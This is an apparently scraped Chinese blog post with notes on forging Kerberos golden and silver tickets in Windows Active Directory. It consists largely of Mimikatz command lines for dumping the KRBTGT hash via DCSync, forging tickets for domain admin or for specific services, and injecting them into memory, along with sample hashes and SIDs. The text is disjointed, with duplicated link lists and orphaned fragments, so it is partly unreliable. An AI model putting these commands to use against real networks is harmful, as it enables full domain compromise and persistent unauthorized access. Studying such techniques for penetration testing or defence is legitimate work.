标签:info nbsp 交互 session user 成功 pos 目录 生成
黄金票据的条件要求: 1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot] 2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value] 3.域的KRBTGT账户NTLM密码哈希 4.伪造用户名 一旦攻击者拥有管理员访问域控制器的权限,就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。
1.导出krbtgt的Hash 在域控上执行通过mimkatz输出: mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"
生成票据 这里可以用aes256 aes128等等
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
导入票据
kerberos::ptt ppc.kiribi
klist
klist purge 删除所有票据
mimikatz # kerberos::purge //清空当前凭证 mimikatz # kerberos::list //查看当前机器凭证 mimikatz # kerberos::ptc 票据文件 //将上一步生成的票据注入到内存中
第二种黄金票据
Hash NTLM: b93dba67240e8236cf1ab028034779e2 aes256_hmac:5c54f6b6d3d4ac4958cf5e04969e60700b69d2285c65ee4e2810e808f4febacckrbtgt
net group "domain admins" /domain
查看域的SID号
whoami /all
kerberos::purge #清空票据 kerberos::golden /admin:administrator /domain:pp.zhong.czf /sid:S-1-5-21-2461438818-3229013638-4126918765 /krbtgt:b93dba67240e8236cf1ab028034779e2 /ticket:ticket.kirbi kerberos::ptt ticket.kirbi kerberos::tgt(此条命令好像并没有用)
kerberos::golden /admin:zhangsanfeng /domain:qianxiao996.com /id:1108 /sid:S-1-5-21-2461438818-3229013638-4126918765-1108 /target:QIANXIAO996-DM.school.com /rc4:b1e99870ac1230e33233fb54f240f171 /service:LDAP /ptt
lsadump::dcsync /dc:QIANXIAO996-DM.qianxiao996.com /domain:qianxiao996.com /user:krbtgt
总结
白银票据不与KDC交互,伪造Ticket直接与server进行交互。我们来看一下windows认证的第六步,server接收到客户端的数据包后,使用自己的密码hash解密ticket得出session key,在使用session key解密Authenticator和timestamp即通过验证,所以我们只需要知道server用户的hash就可以伪造出一个ticket,这就是白银票据。 首先,我们访问一个目标机器的C$文件夹 我们来伪造白银票据,获取目标server用户名 获取NTLM Hash 创建票据命令为: kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt 白银票据根据用户hash生成,而且只能根据某些服务创建,可利用的服务如下 服务注释 服务名 WMI HOST、RPCSS Powershell Remoteing HOST、HTTP WinRM HOST、HTTP Scheduled Tasks HOST LDAP 、DCSync LDAP Windows File Share (CIFS) CIFS Windows Remote ServerAdministration Tools RPCSS、LDAP、CIFS 生成票据 这时候再访问c$,不需要输入密码 0x04 黄金票据分析及利用 第二步中我们收到了AS发送的TGT,由于TGT是使用krbtgt密码hash加密,客户端无法解密,但是如果我们知道了krbtgt的hash,那么就可以直接生成任意用户的TGT,跳过了第一步的认证并可以访问相应的资源,这就是伪造黄金票据。 域控导出krbtgt NTLM Hash 生成黄金票据 kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:golden.ti 在目录下生成了golden.ti票据文件,使用票据 kerberos::ptt golden.ti 这时候生成了一个域管理用户票据,尝试访问其他用户资源,成功,无需验证
-u 域账号+@+域名称,这里是ts1+@+yunying.lab
-p 为当前用户的密码,即ts1的密码
-s 为ts1的SID值,可以通过whoami /all来获参考户的SID值
-d 为当前域的域控
清除缓存导入票据
最后
清除票据后
https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1
https://blog.csdn.net/wy_97/article/details/87649262
https://www.varonis.com/blog/kerberos-attack-silver-ticket/
https://adsecurity.org/?p=2011
https://blog.csdn.net/wy_97/article/details/87649262
https://www.varonis.com/blog/kerberos-attack-silver-ticket/
https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/
特别注意的是sid不是本地管理员的sid是域用户的sid 千万别弄错了 先net user查看域用户的sid 或者切到域用户登陆 whoami /all查看 方可 其他没什么
https://www.cnblogs.com/backlion/p/8127868.html https://blog.csdn.net/qq_36374896/article/details/84453994 https://payloads.online/archivers/2018-11-30/1 https://blog.csdn.net/wy_97/article/details/87649262 https://www.varonis.com/blog/kerberos-attack-silver-ticket/ https://adsecurity.org/?p=2011 https://blog.csdn.net/wy_97/article/details/87649262 https://www.varonis.com/blog/kerberos-attack-silver-ticket/ https://adsecurity.org/?p=2011 https://www.dazhuanlan.com/2019/08/26/5d6304010760d/
在域控上执行通过mimkatz输出:
mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"
标签:info nbsp 交互 session user 成功 pos 目录 生成
原文地址:https://www.cnblogs.com/-zhong/p/12269027.html
